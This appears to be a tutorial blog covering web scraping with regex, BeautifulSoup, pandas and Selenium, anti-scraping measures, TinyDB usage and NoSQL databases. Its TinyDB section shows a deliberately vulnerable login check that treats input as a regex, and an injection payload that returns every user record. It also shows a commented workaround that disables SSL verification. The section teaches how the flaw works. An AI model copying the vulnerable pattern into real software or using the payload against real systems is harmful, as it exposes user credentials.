Author: Giga Alqeeq

Data Scraping

Data scraping is the process of extracting information from a target source and saving it into a file for further use. This target could be a website, an application, or any digital platform containing structured or unstructured data. The main goal of data scraping is to collect large amounts of data efficiently without manual copying, making it easier for organizations or individuals to gather the information they need for analysis or reporting.

The process often involves using automated tools or scripts, such as web crawlers, bots, or specialized scraping frameworks. These tools navigate the target source, locate the desired data, and extract it in a structured format such as CSV, JSON, or Excel. Depending on the source, data scraping may require overcoming challenges such as dynamic content, login requirements, or anti-bot measures. It is a technical process that requires careful handling to ensure accuracy and efficiency.
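As a minimal sketch of the final step described above, the snippet below writes a few already-extracted records to CSV and JSON using only the standard library. The records, the field names, and the helper names `to_csv_text` and `to_json_text` are hypothetical placeholders, not data from a real site.

```python
import csv
import io
import json

# Hypothetical records, standing in for data a scraper has already extracted.
records = [
    {"product": "widget", "price": 9.99},
    {"product": "gadget", "price": 24.50},
]

def to_csv_text(rows):
    """Serialize a list of dicts to CSV text (header taken from the first row)."""
    buffer = io.StringIO()
    writer = csv.DictWriter(buffer, fieldnames=list(rows[0].keys()), lineterminator="\n")
    writer.writeheader()
    writer.writerows(rows)
    return buffer.getvalue()

def to_json_text(rows):
    """Serialize the same rows to a JSON array."""
    return json.dumps(rows, indent=2)

csv_text = to_csv_text(records)
json_text = to_json_text(records)
print(csv_text)
print(json_text)
```

Building the text in memory keeps the sketch free of side effects; writing `csv_text` or `json_text` to a file is then a single `open(...).write(...)` call.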

While data scraping focuses on data collection, the extracted information is often analyzed in a subsequent process called data mining. For example, a web crawler may scrape product details, prices, and reviews from e-commerce websites, and the collected data can then be analyzed to identify trends, patterns, or insights. By separating extraction from analysis, organizations can efficiently manage raw data and transform it into actionable intelligence, making data scraping a crucial first step in many data-driven workflows.
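The split between extraction and analysis can be illustrated with a small sketch. The rows below are invented stand-ins for what a scraper might have collected, and `average_price_by_product` is a hypothetical name for one very simple mining step.

```python
from collections import defaultdict
from statistics import mean

# Hypothetical output of the scraping step: (product, price) pairs collected over several days.
scraped_rows = [
    ("widget", 10.0),
    ("widget", 12.0),
    ("gadget", 30.0),
    ("gadget", 20.0),
]

def average_price_by_product(rows):
    """Mining step: group the raw rows by product and average the prices."""
    prices = defaultdict(list)
    for product, price in rows:
        prices[product].append(price)
    return {product: mean(values) for product, values in prices.items()}

averages = average_price_by_product(scraped_rows)
print(averages)
```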

Web Scraping

Web Scraping is the automated process of extracting data from websites by using software tools or scripts to collect information directly from web pages. Websites can contain either static content, which is fixed in the page’s HTML and generally easier to scrape, or dynamic content, which is generated using JavaScript and may require more advanced tools or browser automation to access. Web scraping is commonly used for data collection, research, price monitoring, market analysis, and cybersecurity investigations. However, it is important to follow ethical and legal guidelines when scraping data, including reviewing the website’s terms of service and robots.txt file to ensure that scraping is permitted, as unauthorized data extraction may violate policies or laws.
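One way to check a robots.txt file programmatically is Python's built-in `urllib.robotparser` module. The sketch below parses a made-up robots.txt from a string so it runs offline; the rules, the `my-scraper` user agent, and the example.com URLs are assumptions for illustration only. Passing this check does not replace reading the site's terms of service.

```python
from urllib.robotparser import RobotFileParser

# Hypothetical robots.txt content; a real scraper would download it from the site
# (for example with RobotFileParser.set_url() followed by read()).
ROBOTS_TXT = """\
User-agent: *
Disallow: /private/
"""

def is_allowed(robots_txt, user_agent, url):
    """Return True if robots_txt permits user_agent to fetch url."""
    parser = RobotFileParser()
    parser.parse(robots_txt.splitlines())
    return parser.can_fetch(user_agent, url)

allowed_public = is_allowed(ROBOTS_TXT, "my-scraper", "https://example.com/wiki/Malware")
allowed_private = is_allowed(ROBOTS_TXT, "my-scraper", "https://example.com/private/data")
print(allowed_public, allowed_private)
```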

Manual Web Scraping

Manual web scraping means extracting data from web pages by hand, without any scraping tools or features. It is convenient for very small amounts of content, but it becomes impractical when the data set is large or has to be collected often. Its main benefit is human review: every data point is checked by the person who collects it.

Manual Web Scraping (Example #1)

Getting all the URLs from this wiki page

Right-click on the page and choose View Page Source

Search the page for href attributes (href sets the destination of a hyperlink), click Highlight All, and copy the matches one by one. This takes a very long time; instead, you can paste the page source into a text editor and extract the links with a regex such as href=["'](?<link>.*?)['"] or (?<=href=")[^"]*

Save them into a file
```
href="/w/load.php?lang=en&amp;modules=codex-search-styles%7Cext.cite.styles%7Cext.uls.interlanguage%7Cext.visualEditor.desktopArticleTarget.noscript%7Cext.wikimediaBadges%7Cjquery.makeCollapsible.styles%7Cskins.vector.icons%2Cstyles%7Cwikibase.client.init&amp;only=styles&amp;skin=vector-2022"
href="/w/load.php?lang=en&amp;modules=ext.gadget.SubtleUpdatemarker%2CWatchlistGreenIndicators&amp;only=styles&amp;skin=vector-2022"
href="/w/load.php?lang=en&amp;modules=site.styles&amp;only=styles&amp;skin=vector-2022"
href="//upload.wikimedia.org"
href="//en.m.wikipedia.org/wiki/Malware"
href="/w/index.php?title=Malware&amp;action=edit"
href="/static/apple-touch/wikipedia.png"
href="/static/favicon/wikipedia.ico"
href="/w/opensearch_desc.php"
href="//en.wikipedia.org/w/api.php?action=rsd"
href="https://en.wikipedia.org/wiki/Malware"
href="https://creativecommons.org/licenses/by-sa/4.0/deed.en"
href="/w/index.php?title=Special:RecentChanges&amp;feed=atom"
href="//meta.wikimedia.org"
href="//login.wikimedia.org"
...
...
...
```
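The same regex step can also be sketched in Python. Python's `re` module writes named groups as `(?P<link>...)`, so this sketch uses the lookbehind pattern from the text instead. The `page_source` fragment is a shortened, hypothetical sample rather than the full page.

```python
import re

# A small hypothetical fragment of page source, pasted in as text.
page_source = '''
<link rel="stylesheet" href="/w/load.php?lang=en&amp;only=styles">
<a href="//upload.wikimedia.org">uploads</a>
<a href="https://en.wikipedia.org/wiki/Malware">Malware</a>
'''

# Lookbehind pattern from the text: capture everything after href=" up to the next quote.
HREF_PATTERN = re.compile(r'(?<=href=")[^"]*')

links = HREF_PATTERN.findall(page_source)
for link in links:
    print(link)
```

Note that this pattern only handles double-quoted attributes and leaves HTML entities such as `&amp;` undecoded, which is one reason a real HTML parser is usually preferred.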
Automated Web Scraping

Automated web scraping uses tools that fetch the content and save it to files. Python is widely used for this, and Python modules such as beautifulsoup and pandas are used for both scraping and mining.

Automated Web Scraping (Example #1)

The beautifulsoup module is good for getting all the URLs from a webpage. This method of scraping is limited: it works well with static content, but it cannot retrieve dynamic content or take a screenshot of the website.

Install beautifulsoup4 and requests using the pip command (lxml is optional; this example uses Python's built-in html.parser)

```
from bs4 import BeautifulSoup  # BeautifulSoup parses the HTML
from requests import get  # get() sends HTTP GET requests
# Browser-like User-Agent header
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36"}
response = get("https://en.wikipedia.org/wiki/Main_Page", headers=headers)  # Send the GET request with the defined headers
print(response.status_code)  # Print the HTTP status code (200 = OK)
soup = BeautifulSoup(response.text, 'html.parser')  # Parse the HTML content
for item in soup.find_all(href=True):  # Loop through all tags that have an href attribute
    print(item['href'])  # Print the link URL
```
Output
```
href="/w/load.php?lang=en&amp;modules=codex-search-styles%7Cext.cite.styles%7Cext.uls.interlanguage%7Cext.visualEditor.desktopArticleTarget.noscript%7Cext.wikimediaBadges%7Cjquery.makeCollapsible.styles%7Cskins.vector.icons%2Cstyles%7Cwikibase.client.init&amp;only=styles&amp;skin=vector-2022"
href="/w/load.php?lang=en&amp;modules=ext.gadget.SubtleUpdatemarker%2CWatchlistGreenIndicators&amp;only=styles&amp;skin=vector-2022"
href="/w/load.php?lang=en&amp;modules=site.styles&amp;only=styles&amp;skin=vector-2022"
href="//upload.wikimedia.org"
href="//en.m.wikipedia.org/wiki/Malware"
href="/w/index.php?title=Malware&amp;action=edit"
href="/static/apple-touch/wikipedia.png"
href="/static/favicon/wikipedia.ico"
href="/w/opensearch_desc.php"
href="//en.wikipedia.org/w/api.php?action=rsd"
href="https://en.wikipedia.org/wiki/Malware"
href="https://creativecommons.org/licenses/by-sa/4.0/deed.en"
href="/w/index.php?title=Special:RecentChanges&amp;feed=atom"
href="//meta.wikimedia.org"
href="//login.wikimedia.org"
...
...
...
```
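Many of the scraped links are relative (`/static/...`) or protocol-relative (`//upload.wikimedia.org`), so they are not directly usable as URLs. A common follow-up step, sketched here with the standard library's `urljoin`, is to resolve them against the address of the page they came from. The `BASE_URL` value is an assumption for illustration.

```python
from urllib.parse import urljoin

# The page the links were scraped from (assumed here for illustration).
BASE_URL = "https://en.wikipedia.org/wiki/Malware"

scraped_links = [
    "/static/favicon/wikipedia.ico",  # root-relative
    "//upload.wikimedia.org",  # protocol-relative
    "https://creativecommons.org/licenses/by-sa/4.0/deed.en",  # already absolute
]

# Resolve every link against the page URL; absolute links pass through unchanged.
absolute_links = [urljoin(BASE_URL, link) for link in scraped_links]
for link in absolute_links:
    print(link)
```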
Automated Web Scraping (Example #2)

The pandas module is good for getting all the tables within a page. As in the previous example, this method of scraping is limited: it works well with static content, but it cannot retrieve dynamic content or take a screenshot of the website.

Install pandas and lxml using the pip command

```
# On SSL certificate errors (macOS), first run: bash /Applications/Python*/Install\ Certificates.command
# Testing-only workaround that disables certificate verification:
#   import ssl; ssl._create_default_https_context = ssl._create_unverified_context
import pandas as pd  # pandas handles the data and parses HTML tables
tables = pd.read_html("https://goblackbears.com/sports/baseball/stats")  # Read every HTML table at the URL into a list of DataFrames
for i, table in enumerate(tables):  # Loop through each table with its index
    print("Table %s\n" % i, table.head())  # Print the table index and its first 5 rows
```
Output
```
Table 0
     0                                                  1
0 NaN  This article has multiple issues. Please help ...
1 NaN  This article needs to be updated. Please help ...
2 NaN  This article needs additional citations for ve...
Table 1
     0                                                  1
0 NaN  This article needs to be updated. Please help ...
Table 2
     0                                                  1
0 NaN  This article needs additional citations for ve...
Table 3
      Virus  ...                                              Notes
0     1260  ...   First virus family to use polymorphic encryption
1       4K  ...  The first known MS-DOS-file-infector to use st...
2      5lo  ...                            Infects .EXE files only
3  Abraxas  ...  Infects COM file. Disk directory listing will ...
4     Acid  ...  Infects COM file. Disk directory listing will ...

[5 rows x 9 columns]
Table 4
      vteMalware topics                                vteMalware topics.1
0   Infectious malware  Comparison of computer viruses Computer virus ...
1          Concealment  Backdoor Clickjacking Man-in-the-browser Man-i...
2   Malware for profit  Adware Botnet Crimeware Fleeceware Form grabbi...
3  By operating system  Android malware Classic Mac OS viruses iOS mal...
4           Protection  Anti-keylogger Antivirus software Browser secu...
```
Automated Web Scraping (Example #3)

One of the best web scraping techniques is using a headless browser, which is a browser that runs without a graphical user interface (GUI). Headless browsers were originally used for automated quality assurance tests but are now widely used for scraping. The two main benefits of a headless browser are that it renders dynamic content and that it behaves like a human browsing a website.

The following scripts will not run on Google Colab

Scrape using Firefox (with geckodriver setup)
1. Install the latest Firefox version
2. Install selenium using the pip command
3. Download the geckodriver from here (The Firefox application version has to match the webdriver version)
4. Extract the geckodriver and note the location (E.g., /scrape/geckodriver)
```
from selenium import webdriver  # Selenium WebDriver
from selenium.webdriver.common.by import By  # Locator strategies; only needed for the optional find_element line
options = webdriver.firefox.options.Options()  # Create a Firefox options object
options.add_argument("--headless")  # Run Firefox in headless mode (no GUI)
service = webdriver.firefox.service.Service(r'path to the geckodriver')  # Local path to the geckodriver executable
browser = webdriver.Firefox(options=options, service=service)  # Launch Firefox with the specified options
browser.get('https://www.google.com')  # Open the Google homepage
#print(browser.find_element(By.XPATH, "/html/body").text)  # (Optional) Print the full page text
browser.save_screenshot("screenshot_using_firefox.png")  # Save a screenshot of the loaded page
browser.close()  # Close the browser window
browser.quit()  # End the WebDriver session
```
Scrape using Firefox (without geckodriver setup)
1. Install the latest Firefox version
2. Install selenium and webdriver-manager using the pip command
```
from selenium import webdriver  # Selenium WebDriver
from selenium.webdriver.common.by import By  # Locator strategies; only needed for the optional find_element line
from webdriver_manager.firefox import GeckoDriverManager  # Downloads and manages geckodriver automatically
options = webdriver.firefox.options.Options()  # Create a Firefox options object
options.add_argument("--headless")  # Run Firefox in headless mode (no GUI)
service = webdriver.firefox.service.Service(GeckoDriverManager().install())  # Set up the geckodriver service
browser = webdriver.Firefox(options=options, service=service)  # Launch Firefox with the specified options
browser.get('https://www.google.com')  # Open the Google homepage
#print(browser.find_element(By.XPATH, "/html/body").text)  # (Optional) Print the full page text
browser.save_screenshot("screenshot_using_firefox.png")  # Save a screenshot of the loaded page
browser.close()  # Close the browser window
browser.quit()  # End the WebDriver session
```
Scrape using Chrome (with chromedriver setup)
1. Install the latest Chrome version
2. Install selenium using the pip command
3. Download the ChromeDriver from here (The Chrome browser version has to match the webdriver version)
4. Extract the ChromeDriver and note the location (E.g., /scrape/chromedriver)
```
from selenium import webdriver  # Selenium WebDriver
from selenium.webdriver.common.by import By  # Locator strategies; only needed for the optional find_element line
options = webdriver.chrome.options.Options()  # Create a Chrome options object
options.add_argument('--headless')  # Run Chrome in headless mode (no GUI)
options.add_argument('--no-sandbox')  # Disable the sandbox (often needed in containers/VMs)
options.add_argument('--disable-dev-shm-usage')  # Prevent shared memory issues
service = webdriver.chrome.service.Service(r'path to the chromedriver')  # Local path to the chromedriver executable
browser = webdriver.Chrome(options=options, service=service)  # Launch Chrome with the specified options
browser.get('https://www.google.com')  # Open the Google homepage
#print(browser.find_element(By.XPATH, "/html/body").text)  # (Optional) Print the full page text
browser.save_screenshot("screenshot_using_chrome.png")  # Save a screenshot of the loaded page
browser.close()  # Close the browser window
browser.quit()  # End the WebDriver session
```
Scrape using Chrome (without chromedriver setup)
1. Install the latest Chrome version
2. Install selenium and webdriver-manager using the pip command
```
from selenium import webdriver  # Selenium WebDriver
from selenium.webdriver.common.by import By  # Locator strategies; only needed for the optional find_element line
from webdriver_manager.chrome import ChromeDriverManager  # Downloads and manages ChromeDriver automatically
options = webdriver.chrome.options.Options()  # Create a Chrome options object
options.add_argument('--headless')  # Run Chrome in headless mode (no GUI)
options.add_argument('--no-sandbox')  # Disable the sandbox (required in some environments)
options.add_argument('--disable-dev-shm-usage')  # Avoid shared memory issues in containers
service = webdriver.chrome.service.Service(ChromeDriverManager().install())  # Set up the ChromeDriver service
browser = webdriver.Chrome(options=options, service=service)  # Launch Chrome with the specified options
browser.get('https://www.google.com')  # Open the Google homepage
#print(browser.find_element(By.XPATH, "/html/body").text)  # (Optional) Print the full page text
browser.save_screenshot("screenshot_using_chrome.png")  # Save a screenshot of the loaded page
browser.close()  # Close the browser window
browser.quit()  # End the WebDriver session
```
Automated Web Scraping (Example #4 – Best Option)

You can run this one in Google Colab

Install the latest Chrome version

```
!apt update  # Update the package list from the repositories
!apt install libu2f-udev libvulkan1  # Install dependencies required by Google Chrome
!wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb  # Download the Google Chrome .deb package
!dpkg -i google-chrome-stable_current_amd64.deb  # Install the Chrome package manually
!apt --fix-broken install  # Fix missing dependencies left by the dpkg install
!pip install selenium webdriver-manager  # Install Selenium and the driver manager via pip
```
Scrape the website

```
from selenium import webdriver  # Selenium WebDriver
from webdriver_manager.chrome import ChromeDriverManager  # Downloads and manages ChromeDriver automatically
from selenium.webdriver.common.by import By  # Locator strategies (e.g., XPATH)
options = webdriver.chrome.options.Options()  # Create a Chrome options object
options.add_argument('--headless')  # Run Chrome without a visible window
options.add_argument('--no-sandbox')  # Disable the sandbox (needed in containers/Colab)
options.add_argument('--disable-dev-shm-usage')  # Prevent shared memory issues
service = webdriver.chrome.service.Service(ChromeDriverManager().install())  # Install and configure the ChromeDriver service
browser = webdriver.Chrome(options=options, service=service)  # Launch Chrome with the defined options
browser.get('https://www.google.com')  # Open the Google homepage
#print(browser.find_element(By.XPATH, "/html/body").text)  # (Optional) Print the page text using XPath
browser.save_screenshot("screenshot_using_chrome.png")  # Save a screenshot of the loaded page
browser.close()  # Close the browser window
browser.quit()  # End the WebDriver session
```
If you want to wait until a website loads, you can use the sleep function

```
from selenium import webdriver  # Selenium WebDriver
from webdriver_manager.chrome import ChromeDriverManager  # Downloads and manages ChromeDriver automatically
from selenium.webdriver.common.by import By  # Locator strategies (e.g., XPATH)
from time import sleep  # sleep() pauses the script
options = webdriver.chrome.options.Options()  # Create a Chrome options object
options.add_argument('--headless')  # Run Chrome without a visible window
options.add_argument('--no-sandbox')  # Disable the sandbox (needed in containers/Colab)
options.add_argument('--disable-dev-shm-usage')  # Prevent shared memory issues
service = webdriver.chrome.service.Service(ChromeDriverManager().install())  # Install and configure the ChromeDriver service
browser = webdriver.Chrome(options=options, service=service)  # Launch Chrome with the defined options
browser.get('https://us.shop.battle.net/en-us')  # Open the Battle.net shop homepage
sleep(10)  # Wait 10 seconds for the page to finish loading
#print(browser.find_element(By.XPATH, "/html/body").text)  # (Optional) Print the page text using XPath
browser.save_screenshot("screenshot_using_chrome.png")  # Save a screenshot of the loaded page
browser.close()  # Close the browser window
browser.quit()  # End the WebDriver session
```
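A fixed sleep is either longer than needed or too short on a slow connection. A common alternative is to poll for a condition until a deadline; Selenium ships this idea as `WebDriverWait` in `selenium.webdriver.support.ui`. The sketch below is a library-independent illustration of the same pattern; `wait_until` and `page_is_ready` are hypothetical names, and the simulated page stands in for a real browser check.

```python
import time

def wait_until(condition, timeout=10.0, interval=0.5):
    """Poll condition() until it returns a truthy value or timeout seconds pass.

    Returns the truthy value, or raises TimeoutError if the deadline is reached.
    """
    deadline = time.monotonic() + timeout
    while True:
        result = condition()
        if result:
            return result
        if time.monotonic() >= deadline:
            raise TimeoutError("condition was not met within %.1f seconds" % timeout)
        time.sleep(interval)

# Stand-in for a page that becomes ready on the third check; with Selenium the
# condition could instead wrap a call such as browser.find_elements(...).
checks = {"count": 0}

def page_is_ready():
    checks["count"] += 1
    return checks["count"] >= 3

wait_until(page_is_ready, timeout=5.0, interval=0.01)
print("ready after", checks["count"], "checks")
```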
Anti Web Scraping

Many websites do not allow web scraping and implement anti-scraping measures to prevent users from scraping their content, so scaling a scraper is a tough and tedious job. E.g., if you run the following script, which sends a request every second, you will be blocked and shown a message telling you to slow down!

Example
```
import requests
import time
while True:
    res = requests.get("https://snort-org-site.s3.amazonaws.com/production/document_files/files/000/043/211/original/ip-filter.blf")
    print(res.text)
    time.sleep(1)
```
Output
```
You have exceeded 5 requests to the blacklist in under one minute.  Please slow down.
```
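A polite scraper reacts to a message like this by slowing down rather than retrying at the same pace. The sketch below shows one common approach, exponential backoff, under stated assumptions: `fetch_with_backoff` is a hypothetical helper, and `fetch` is a stand-in callable returning `(ok, body)` so the example runs without network access.

```python
import time

def fetch_with_backoff(fetch, max_attempts=5, base_delay=1.0, sleep=time.sleep):
    """Call fetch() until it succeeds, doubling the pause after each rejection.

    fetch is any callable returning (ok, body); it is a hypothetical stand-in
    for a real HTTP request so the sketch runs without network access.
    """
    delay = base_delay
    for attempt in range(1, max_attempts + 1):
        ok, body = fetch()
        if ok:
            return body
        if attempt < max_attempts:
            sleep(delay)  # wait before retrying
            delay *= 2  # 1s, 2s, 4s, ...
    raise RuntimeError("still rate limited after %d attempts" % max_attempts)

# Simulated server that rejects the first two requests.
responses = iter([(False, "Please slow down."), (False, "Please slow down."), (True, "data")])
waits = []  # records the requested pauses instead of actually sleeping
body = fetch_with_backoff(lambda: next(responses), sleep=waits.append)
print(body, waits)
```

Injecting `sleep` as a parameter keeps the example fast to run; in a real scraper the default `time.sleep` would be used.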
Anti Web Scraping Techniques
- Fingerprinting
  - Collect information about the device, such as IP address, user agent, and system resources
- User Behavior Analysis
  - Analyze how users interact with the resources and block them if they keep repeating the same pattern
- Authentication
  - Add login walls to resources
- Challenges
  - Add challenges such as a CAPTCHA that must be solved to reveal resources
- Honeypots
  - Add honeypots that log users and direct them to different resources if they violate the scraping policy
- Dynamic content
  - Switch from static content to dynamic content (the content changes dynamically at runtime)
- Randomizing identifiers
  - Part of dynamic content: element identifiers are randomly generated, so scrapers cannot rely on them
- Rate limits
  - Limit the number of requests each user can make in a given period
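To make the rate-limit technique concrete, here is a minimal sketch of a sliding-window limiter as a site might run it. The limit of 5 requests per 60 seconds mirrors the message in the earlier output, but how that server actually enforces it is unknown; the class name, the client address, and the explicit `now` argument are assumptions chosen to keep the example deterministic.

```python
from collections import deque

class SlidingWindowLimiter:
    """Allow at most max_requests per client within any window_seconds span."""

    def __init__(self, max_requests=5, window_seconds=60.0):
        self.max_requests = max_requests
        self.window_seconds = window_seconds
        self.history = {}  # client id -> deque of accepted request timestamps

    def allow(self, client_id, now):
        """Check a request made at time now (seconds) and report whether it is allowed."""
        timestamps = self.history.setdefault(client_id, deque())
        # Forget requests that have fallen out of the window.
        while timestamps and now - timestamps[0] >= self.window_seconds:
            timestamps.popleft()
        if len(timestamps) >= self.max_requests:
            return False
        timestamps.append(now)
        return True

limiter = SlidingWindowLimiter(max_requests=5, window_seconds=60.0)
# One request per second from the same (hypothetical) client address.
decisions = [limiter.allow("203.0.113.7", now=float(second)) for second in range(7)]
print(decisions)
```

The sixth and seventh requests are rejected because five requests are already inside the window; the client is allowed again once the oldest request is more than a minute old.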
April 5, 2026
TinyDB

TinyDB is a document-oriented database written in pure Python. You will need to download and install it using the pip command

Install

```
# pip: Python's package manager
# install: the command that downloads and installs libraries from PyPI (Python Package Index)
# tinydb: a lightweight Python NoSQL database library
pip install tinydb
```
Create a Database

TinyDB() opens the local database file, or creates a new one if the file does not exist

```
from tinydb import TinyDB  # Import the TinyDB class from the tinydb module
db = TinyDB('database.json')  # Open database.json, creating it if it does not exist
```
List All Tables

You can list all tables using the .tables() method. A table is listed only if it contains data; otherwise it won't be shown

```
from tinydb import TinyDB  # Import the TinyDB class from the tinydb module
db = TinyDB('database.json')  # Open database.json, creating it if it does not exist
print(db.tables())  # Print the names of all tables that contain data
```
Output
```
{'_default'}
```
Create a Table

TinyDB supports tables, although you do not need to use them. To create a table, use the .table() method

```
from tinydb import TinyDB  # Import the TinyDB class from the tinydb module
db = TinyDB('database.json')  # Open database.json, creating it if it does not exist
table = db.table('users')  # Access the 'users' table (it is created on first use)
```
Delete Table

You can delete a table and all of its data using the .drop_table() method

```
from tinydb import TinyDB  # Import the TinyDB class from the tinydb module
db = TinyDB('database.json')  # Open database.json, creating it if it does not exist
db.drop_table('users')  # Delete the entire 'users' table
print(db.tables())  # Show the remaining tables
```
Output
```
{'_default'}
```
Insert Data

To add new data, use the .insert() method

```
from tinydb import TinyDB  # Import the TinyDB class from the tinydb module
db = TinyDB('database.json')  # Open database.json, creating it if it does not exist
db.drop_table('users')  # Start from a clean 'users' table
table = db.table('users')  # Access the 'users' table (it is created on first use)
table.insert({"id": 1,"user": "john","hash": "e66860546f18"})  # Insert a new record (dictionary) into the table
table.insert({"id": 2,"user": "jane","hash": "cdbbcd86b35e", "car":"ford"})  # Records do not need to share the same fields
```
Fetching Results

To fetch items from the database, use the .all() method

```
from tinydb import TinyDB  # Import the TinyDB class from the tinydb module
db = TinyDB('database.json')  # Open database.json, creating it if it does not exist
db.drop_table('users')  # Start from a clean 'users' table
table = db.table('users')  # Access the 'users' table (it is created on first use)
table.insert({"id": 1,"user": "john","hash": "e66860546f18"})  # Insert a new record (dictionary) into the table
table.insert({"id": 2,"user": "jane","hash": "cdbbcd86b35e", "car":"ford"})  # Insert a second record
print(table.all())  # Retrieve and print all records from the 'users' table
```
Output
```
[{'id': 1, 'user': 'john', 'hash': 'e66860546f18'}, {'id': 2, 'user': 'jane', 'hash': 'cdbbcd86b35e', 'car': 'ford'}]
```
Find Data

You can fetch specific records using the .search() method

```
from tinydb import TinyDB, where  # Import the TinyDB class and the where() query helper
db = TinyDB('database.json')  # Open database.json, creating it if it does not exist
db.drop_table('users')  # Start from a clean 'users' table
table = db.table('users')  # Access the 'users' table (it is created on first use)
table.insert({"id": 1,"user": "john","hash": "e66860546f18"})  # Insert a new record (dictionary) into the table
table.insert({"id": 2,"user": "jane","hash": "cdbbcd86b35e", "car":"ford"})  # Insert a second record
results = table.search(where('user') == 'jane')  # Find all records whose 'user' field equals 'jane'
print(results)  # Print the list of matching records
```
Output
```
[{'id': 2, 'user': 'jane', 'hash': 'cdbbcd86b35e', 'car': 'ford'}]
```
Update Data

You can update data by using the .update() method

```
from tinydb import TinyDB, where  # Import the TinyDB class and the where() query helper
db = TinyDB('database.json')  # Open database.json, creating it if it does not exist
db.drop_table('users')  # Start from a clean 'users' table
table = db.table('users')  # Access the 'users' table (it is created on first use)
table.insert({"id": 1,"user": "john","hash": "e66860546f18"})  # Insert a new record (dictionary) into the table
table.insert({"id": 2,"user": "jane","hash": "cdbbcd86b35e", "car":"ford"})  # Insert a second record
table.update({'car': 'jeep'}, where('user') == 'jane')  # Set 'car' to 'jeep' on every record whose 'user' is 'jane'
print(table.all())  # Retrieve and print all records from the 'users' table
```
Output
```
[{'id': 1, 'user': 'john', 'hash': 'e66860546f18'}, {'id': 2, 'user': 'jane', 'hash': 'cdbbcd86b35e', 'car': 'jeep'}]
```
Delete Specific Data

You can delete data by using the .remove() method

```
from tinydb import TinyDB, where  # Import the TinyDB class and the where() query helper
db = TinyDB('database.json')  # Open database.json, creating it if it does not exist
db.drop_table('users')  # Start from a clean 'users' table
table = db.table('users')  # Access the 'users' table (it is created on first use)
table.insert({"id": 1,"user": "john","hash": "e66860546f18"})  # Insert a new record (dictionary) into the table
table.insert({"id": 2,"user": "jane","hash": "cdbbcd86b35e", "car":"ford"})  # Insert a second record
table.remove(where('user') == 'jane')  # Remove every record whose 'user' is 'jane'
print(table.all())  # Retrieve and print all records from the 'users' table
```
Output
```
[{'id': 1, 'user': 'john', 'hash': 'e66860546f18'}]
```
Delete All Data

You can delete all the data within a table using the .drop_table() method (the .drop_tables() method removes every table in the database)

```
from tinydb import TinyDB  # Import the TinyDB class from the tinydb module
db = TinyDB('database.json')  # Open database.json, creating it if it does not exist
db.drop_table('users')  # Delete the entire 'users' table
print(db.tables())  # Retrieve and print the remaining tables
```
Output
```
{'_default'}
```
User Input (NoSQL Injection)

A threat actor can construct a malicious query and use it to perform an unauthorized action

```
from tinydb import TinyDB, Query  # Import the TinyDB class and the Query builder
temp_user = input("Enter username: ")  # Prompt the user to enter a username
temp_hash = input("Enter password: ")  # Prompt for a password (the hashing step a real application would have is omitted)
db = TinyDB('database.json')  # Open database.json, creating it if it does not exist
db.drop_table('users')  # Start from a clean 'users' table
table = db.table('users')  # Access the 'users' table (it is created on first use)
table.insert({"id": 1,"user": "john","hash": "e66860546f18"})  # Insert a new record (dictionary) into the table
table.insert({"id": 2,"user": "jane","hash": "cdbbcd86b35e", "car":"ford"})  # Insert a second record
if len(temp_hash) == 12:  # Only continue if the supplied value is 12 characters long
    # Vulnerable: .search() treats both inputs as regex patterns, not literal strings
    results = table.search(Query().user.search(temp_user) & Query().hash.search(temp_hash))
    print(results)  # Print all matching records
```
Malicious statement

If a user enters [a-zA-Z0-9]+ for both the username and the password, the input passes the length check (the pattern is exactly 12 characters long) and both john and jane are returned. When TinyDB evaluates Query().user.search(temp_user), it does not look for the literal text [a-zA-Z0-9]+. Instead, it treats the input as a regex pattern, which matches any value containing letters or digits; the same applies to the hash field.
```
[a-zA-Z0-9]+ matches john -> True, retrieve this user
[a-zA-Z0-9]+ matches jane -> True, retrieve this user
```
Output
```
[{'id': 1, 'user': 'john', 'hash': 'e66860546f18'}, {'id': 2, 'user': 'jane', 'hash': 'cdbbcd86b35e', 'car': 'ford'}]
```
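A minimal sketch of why the pattern matches and how a literal comparison avoids it. It uses only the standard library, with a plain list of dictionaries standing in for the users table; the helper names find_users_regex and find_users_literal are hypothetical. In TinyDB itself, the literal variant would roughly correspond to comparing with Query().user == temp_user instead of calling .search().

```python
import re

# Stand-in for the 'users' table (plain dictionaries, not a real TinyDB table)
users = [
    {"id": 1, "user": "john", "hash": "e66860546f18"},
    {"id": 2, "user": "jane", "hash": "cdbbcd86b35e", "car": "ford"},
]

def find_users_regex(pattern):
    """Hypothetical lookup that interprets the input as a regex pattern."""
    return [u for u in users if re.search(pattern, u["user"])]

def find_users_literal(name):
    """Hypothetical lookup that compares the input as a literal string."""
    return [u for u in users if u["user"] == name]

payload = "[a-zA-Z0-9]+"

regex_hits = find_users_regex(payload)               # pattern matches every username
literal_hits = find_users_literal(payload)           # no user is literally named "[a-zA-Z0-9]+"
escaped_hits = find_users_regex(re.escape(payload))  # escaping neutralizes the metacharacters

print(len(regex_hits), len(literal_hits), len(escaped_hits))
```

Exact comparison is usually the simpler choice for credentials; escaping with re.escape() is an alternative when a substring search is genuinely needed.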
April 5, 2026
Non-Relational Databases

Non-relational databases, often called NoSQL databases, are designed to store data in a more flexible format compared to relational databases. They can handle structured, semi-structured, and unstructured data, making them ideal for modern applications that deal with diverse data types. Instead of tables with fixed rows and columns, non-relational databases use user-defined models such as documents, key-value pairs, wide columns, or graphs. This flexibility allows developers to easily adapt the database to changing requirements without redesigning the entire schema.

Non-relational databases organize data according to the chosen data model. For example, document databases like MongoDB store data as JSON-like documents, while key-value stores like Redis store data as key-value pairs. Graph databases, on the other hand, focus on relationships between data points, making them ideal for social networks or recommendation systems. Unlike relational databases, non-relational databases often do not enforce strict schemas or relationships, allowing rapid development and the handling of large-scale, dynamic datasets.

Non-relational databases are widely used in applications that require high scalability, performance, and flexibility, such as big data analytics, real-time web applications, and content management systems. They can efficiently manage large volumes of diverse data and are often horizontally scalable, meaning they can distribute data across multiple servers. Popular non-relational databases include MongoDB, Cassandra, Redis, and Neo4j, each optimized for specific use cases. Their ability to handle various data types and adapt to changing requirements makes them a critical component in modern data architectures.

Example

A database with a collection of two documents that have different key-value pairs
```
[
  {
    "id": 1,
    "user": "john",
    "hash": "e66860546f18"
  },
  {
    "id": 2,
    "user": "jane",
    "hash": "cdbbcd86b35e",
    "car": "ford"
  }
]
```
